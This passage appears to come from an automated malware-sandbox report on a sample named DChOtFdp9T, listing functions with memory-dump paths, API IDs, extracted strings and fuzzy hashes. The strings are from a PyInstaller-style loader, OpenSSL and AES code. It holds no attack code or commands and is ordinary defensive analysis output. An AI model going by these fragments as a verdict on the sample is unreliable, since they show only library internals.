                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                            • Opcode ID: 8ef0bfd7792066e9e5c57244da8e519c012d890f076a147f3febad81e67efa64
                                                                                                                                                                                                                            • Instruction ID: 7386165c8d81491c8f5b2032706016064dd7a730c507caace44343a0afb06f49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ef0bfd7792066e9e5c57244da8e519c012d890f076a147f3febad81e67efa64
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD12A532E0C35386FB609A16E0547B97AA1FF8075CFA44135E699876C6DFBCE480CB81
                                                                                                                                                                                                                            Function 00007FFE0CFE2760 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 154COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878218664.00007FFE0CFE1000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FFE0CFE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878198987.00007FFE0CFE0000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878236359.00007FFE0CFE3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878254447.00007FFE0CFE4000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878272126.00007FFE0CFE5000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfe0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _wassert$memcpy
                                                                                                                                                                                                                            • String ID: ((Nk==4) && (Nr==10)) || ((Nk==6) && (Nr==12)) || ((Nk==8) && (Nr==14))$(idx>=1) && (idx<=10)$src/AESNI.c$src/AESNI.c
                                                                                                                                                                                                                            • API String ID: 4292997394-722309440
                                                                                                                                                                                                                            • Opcode ID: d39dd8ff127fcd6812d8991013f514968d842da6ae2888197d778fac17dca971
                                                                                                                                                                                                                            • Instruction ID: b32b53fb5c849e5aa190cb1eea21b4567d5eb7a5492811bbae6f54e25815f1d6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d39dd8ff127fcd6812d8991013f514968d842da6ae2888197d778fac17dca971
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E361D172E48A8681EA218F2DE4042BD73A5FF98B44F514236CB4D23769EF3CE585C742
                                                                                                                                                                                                                            Function 00007FF602991050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                            • Opcode ID: 14698be467b01466d0b780f10686b1ed67d52cdc79d3a2d7e4c3244a81fb259a
                                                                                                                                                                                                                            • Instruction ID: 61071919497190408305b52eff83032eb13e3f3dd0a51340af775f8bec4c68fa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14698be467b01466d0b780f10686b1ed67d52cdc79d3a2d7e4c3244a81fb259a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E341A121B086435AFA209B1BA9402BAAB91FF44BECF644031DD4DC7B97DEBCF4158740
                                                                                                                                                                                                                            Function 00007FFDFF2B3ED0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$create_ticket_prequel
                                                                                                                                                                                                                            • API String ID: 193678381-2110699330
                                                                                                                                                                                                                            • Opcode ID: e06727b8e6375174c0208e619049dbcc885a0041a93c4ae4b65a804a49454f3d
                                                                                                                                                                                                                            • Instruction ID: 9709255808ac26e677aeaa56d12191070b2f1085adb84e085006e71147a93132
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e06727b8e6375174c0208e619049dbcc885a0041a93c4ae4b65a804a49454f3d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0417120B1C68289F7549A22E8A1FB92750EB85B84F544631DE7EC7ADEDE2DE9418700
                                                                                                                                                                                                                            Function 00007FFDFF27D02E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 101COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_indentO_printf
                                                                                                                                                                                                                            • String ID: ,$NamedGroup: %s (%d)$UNKNOWN$key_exchange:
                                                                                                                                                                                                                            • API String ID: 1860387303-2250237447
                                                                                                                                                                                                                            • Opcode ID: 0641e6cc35b3c44cb9c6518ae0513edfde36eb4bbc4393359f871d520734044d
                                                                                                                                                                                                                            • Instruction ID: 02af5ed1fe844948c8535df357059e60c5de7ce89647e25633d9f0d884b4f4e0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0641e6cc35b3c44cb9c6518ae0513edfde36eb4bbc4393359f871d520734044d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2041D763B0D6A245EB148B12A438DB96B91AB41780F854332DDBED73C9EE3DF542C704
                                                                                                                                                                                                                            Function 00007FF602997F10 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                            • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                                            • API String ID: 2895956056-699529898
                                                                                                                                                                                                                            • Opcode ID: bad98a2e6fff8929db7f8baee1eb0b6edf4e9f8e86b040b8313d0eea73b8bd2b
                                                                                                                                                                                                                            • Instruction ID: 90ba3ad141af14384b1a085431f9e99838602150f9cc0e0227781e7c16ddf57f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bad98a2e6fff8929db7f8baee1eb0b6edf4e9f8e86b040b8313d0eea73b8bd2b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A413131A0878285EB209B65F4452AEB7A0FF89378F600335E6AD877D6DFBCD0548B40
                                                                                                                                                                                                                            Function 00007FFDFF24DD32 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$R_set_error$Y_freeY_get_security_bits
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_lib.c$ssl3_ctx_ctrl
                                                                                                                                                                                                                            • API String ID: 3247900180-780421027
                                                                                                                                                                                                                            • Opcode ID: cf3535a55e2d6c7fe94a94c1794b78ceedf774a3b80580de09ebf95b179a120c
                                                                                                                                                                                                                            • Instruction ID: 42f14f7e50c16dd16fb6b81f7deef5823d855a33c89659e4165836092cf5ebbb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf3535a55e2d6c7fe94a94c1794b78ceedf774a3b80580de09ebf95b179a120c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB018E51B1D84286FB449351A572AB943519F81394FC84231DE3DC66CFED2CE5418B00
                                                                                                                                                                                                                            Function 00007FF60299DA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                                            • Opcode ID: ad2eac301c283c78c5a486e2d323c9c7bba1650ce64e647d15fee4f7d5c41a3a
                                                                                                                                                                                                                            • Instruction ID: 93098e32f870effb9facc280b8d9133888da80a053ba9aa26927f05bb22821f4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad2eac301c283c78c5a486e2d323c9c7bba1650ce64e647d15fee4f7d5c41a3a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4D175329087418AEB20EB6AD4813AD7BA4FF557ACF200135EE4D97B96DF78E460C750
                                                                                                                                                                                                                            Function 00007FF6029ADB90 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6029ADF2A,?,?,0000017808186D18,00007FF6029A9BD3,?,?,?,00007FF6029A9ACA,?,?,?,00007FF6029A4F9E), ref: 00007FF6029ADD0C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6029ADF2A,?,?,0000017808186D18,00007FF6029A9BD3,?,?,?,00007FF6029A9ACA,?,?,?,00007FF6029A4F9E), ref: 00007FF6029ADD18
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                                            • Opcode ID: f65bba0801ac06b96f2f3a4d918bbe6eed0efd0f6f5c7edcd61ac98fb66de638
                                                                                                                                                                                                                            • Instruction ID: 37b8f41db3b582c36bb714a0148e73a103e7023c6195ff2381ec3a7a31354a43
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f65bba0801ac06b96f2f3a4d918bbe6eed0efd0f6f5c7edcd61ac98fb66de638
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E341E521F19B0241FB16CB1798005752BA1BF49BA8FA85135DD0DC7B86EFFDE8458390
                                                                                                                                                                                                                            Function 00007FF602997B90 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF602993834), ref: 00007FF602997C34
                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF602993834), ref: 00007FF602997C7C
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997D60: GetEnvironmentVariableW.KERNEL32(00007FF60299365F), ref: 00007FF602997D97
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997D60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF602997DB9
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A70B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029A70C9
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029926C0: MessageBoxW.USER32 ref: 00007FF602992736
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                            • API String ID: 740614611-1339014028
                                                                                                                                                                                                                            • Opcode ID: fd22cb766a472744957bb80ea050f2533f84ee64c606121cb2f23662b2697a9d
                                                                                                                                                                                                                            • Instruction ID: 2564563cf5da7d49b9a4b7835d0df9a80b270be2010a6f9454b4957c05495515
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd22cb766a472744957bb80ea050f2533f84ee64c606121cb2f23662b2697a9d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2941A051E2964349FA20EB6B95552F95A51EF89BACF704032EE0EC77D7EEBCE5008240
                                                                                                                                                                                                                            Function 00007FFDFF2AEF80 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugX509i2d_
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_lib.c$ssl_add_cert_to_wpacket
                                                                                                                                                                                                                            • API String ID: 3356145284-2373850725
                                                                                                                                                                                                                            • Opcode ID: 7545746bfbf8784fbfdd62f01f2d4ca702a1ebd2b419c9790c8638fa1de03fd3
                                                                                                                                                                                                                            • Instruction ID: e9ed9bb2e8f085e92aaba44b9b8b27bed984bbc93c43888209c6b4bf0e5fcc1a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7545746bfbf8784fbfdd62f01f2d4ca702a1ebd2b419c9790c8638fa1de03fd3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67317521B0CB8285E7149712E460BAA6351AB85BC4F448231EE7DCBBDEDE6DE6418740
                                                                                                                                                                                                                            Function 00007FFDFF24FFB0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugX_freeX_new_from_nameY_free
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_lib.c$ssl_generate_param_group
                                                                                                                                                                                                                            • API String ID: 2173273376-2643799583
                                                                                                                                                                                                                            • Opcode ID: 363896e0a2a831b43094d1603262f4186dc98a409229c3000947fd7c93347a3f
                                                                                                                                                                                                                            • Instruction ID: 05238c96744541fe2cbaec22889812b49dcd00352a4115cb446041487aab0975
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 363896e0a2a831b43094d1603262f4186dc98a409229c3000947fd7c93347a3f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07219D61B1DB4241EB44EB16A861AA96350BF85B94F880231EE7EC77CFEE2CE4018740
                                                                                                                                                                                                                            Function 00007FFDFF26C040 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
